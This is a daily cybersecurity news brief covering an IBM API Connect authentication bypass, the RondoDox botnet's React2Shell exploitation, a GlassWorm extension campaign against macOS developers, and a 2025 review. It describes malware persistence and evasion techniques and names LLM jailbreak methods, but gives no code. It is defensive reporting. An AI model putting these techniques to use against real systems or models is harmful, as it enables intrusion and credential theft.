Urgent IBM API Fixes Amid Botnet and macOS Threats
Coverage: 01 Jan 2026 (UTC)
< view all daily briefs >Urgent platform guidance led the day as IBM moved to contain an authentication bypass in API Connect with interim fixes and mitigations, per CSO. On the incident front, researchers detailed a botnet abusing the critical React2Shell flaw to conscript web apps and IoT devices, according to THN. macOS developers also faced a renewed supply‑chain threat as GlassWorm resurfaced via trojanized editor extensions, reported by BleepingComputer.
API gateways under pressure
IBM API Connect received interim fixes and urgent guidance for CVE‑2025‑13915, a critical flaw enabling remote, no‑interaction authentication bypass across releases 10.0.8.0–10.0.8.5 and 10.0.11.0, per CSO. IBM issued platform‑specific updates for VMware, OCP/CP4I, and Kubernetes deployments and recommended temporarily disabling self‑service sign‑up on Developer Portals if patching is delayed. The weakness, mapped to CWE‑305, was found during internal testing and can expose applications that inherit trust from the gateway rather than revalidating identity.
Analysis cited in the report notes that bypassing gateway‑enforced identity can silently cascade trust failures across downstream services and significantly widen blast radius across the control plane. Remediation touches management‑plane components and uses image overrides, introducing operational risk if temporary changes persist across upgrades. The guidance emphasizes accelerating patching, inventorying API endpoints and dependencies, enabling behavior monitoring and enhanced logging, and reassessing API governance and resilience—not just applying a point fix. Why it matters: gateways are often a single enforcement point; when identity checks fail there, failures propagate.
Botnet turns a critical web flaw into scale
Researchers describe a nine‑month campaign that added IoT devices and web apps to the RondoDox botnet by exploiting the React2Shell vulnerability in React Server Components/Next.js (CVE‑2025‑55182, CVSS 10.0), according to THN. The operation, active since early 2025, also leverages N‑day flaws including CVE‑2023‑1389 and CVE‑2025‑24893. Shadowserver telemetry counted about 90,300 publicly reachable instances still vulnerable as of December 31, 2025, with roughly 68,400 in the U.S., 4,300 in Germany, 2,800 in France, and 1,500 in India.
Activity evolved from March–April reconnaissance and manual scanning to April–June daily mass probing of web apps (WordPress, Drupal, Struts2) and IoT devices (Wavlink routers), progressing by July into hourly automated deployments. In observed December waves, operators scanned for vulnerable Next.js servers and deployed cryptocurrency miners ("/nuts/poop"), a loader/health checker ("/nuts/bolts"), and a Mirai variant ("/nuts/x86"). The /nuts/bolts component removes competing malware and Docker artifacts, enumerates /proc, aggressively kills non‑whitelisted processes about every 45 seconds, establishes persistence via /etc/crontab, and then pulls the main bot from its command‑and‑control. Mitigations highlighted by researchers include patching Next.js, segmenting IoT devices on dedicated VLANs, using web application firewalls, monitoring for suspicious process execution, and blocking known C2 infrastructure.
Trojanized extensions target macOS developers
A fourth GlassWorm wave is targeting macOS developers through trojanized extensions on OpenVSX and the Visual Studio Marketplace, BleepingComputer reports, citing Koi Security research. Unlike earlier waves using invisible Unicode tricks or Rust binaries, this iteration hides an AES‑256‑CBC‑encrypted payload in compiled JavaScript and delays execution ~15 minutes to evade sandboxing. Persistence is installed via LaunchAgents, with AppleScript used in place of PowerShell, while command‑and‑control again relies on Solana blockchain mechanisms.
Capabilities include theft of developer credentials (GitHub, npm, OpenVSX), browser data, and Keychain passwords, plus remote access via VNC and SOCKS proxying. The operators can detect wallet software such as Ledger Live and Trezor Suite and attempt replacement with trojanized versions; researchers note the seeded wallets currently return empty files, suggesting incomplete payload deployment. Identified extensions show more than 33,000 installs, though download counts can be gamed. Immediate steps advised: remove flagged extensions, reset GitHub passwords, revoke npm tokens, hunt for indicators of compromise, and consider OS reinstallation if infection is confirmed. Why it matters: third‑party extension ecosystems remain a high‑leverage route to developer workstations and cryptocurrency assets.
2025 lessons shaping priorities
Infosecurity’s year‑end review highlights a year defined by high‑impact incidents and shifting defenses. Vendor dynamics included Microsoft, SentinelOne, and Palo Alto Networks stepping back from MITRE ATT&CK Evaluations, prompting renewed engagement plans from MITRE. Vulnerability management advanced with NIST’s Likely Exploited Vulnerabilities (LEV) metric complementing EPSS and KEV to refine remediation priorities. Fortinet features prominently with a data release tied to a 2022 zero‑day and a separate critical zero‑day (CVE‑2024‑55591) that drove urgent patching and credential rotation.
Supply‑chain risks surfaced through quick removal of malicious npm packages carrying a crypto‑clipper payload, underscoring the community’s fast response. Attack techniques evolved: QR‑code quishing to bypass email filters, LLM jailbreaks such as the Grok‑4 exploit blending Echo Chamber and Crescendo methods, and “slopsquatting,” where hallucinated package names create new supply‑chain exposure. To counter AI‑driven risks, OWASP’s Securing Agentic Applications Guide v1.0 offered practical controls for agentic and multi‑agent systems. The thread through these stories is consistent: better vulnerability prioritization, proactive patching, and stronger software supply‑chain hygiene will shape 2026 agendas.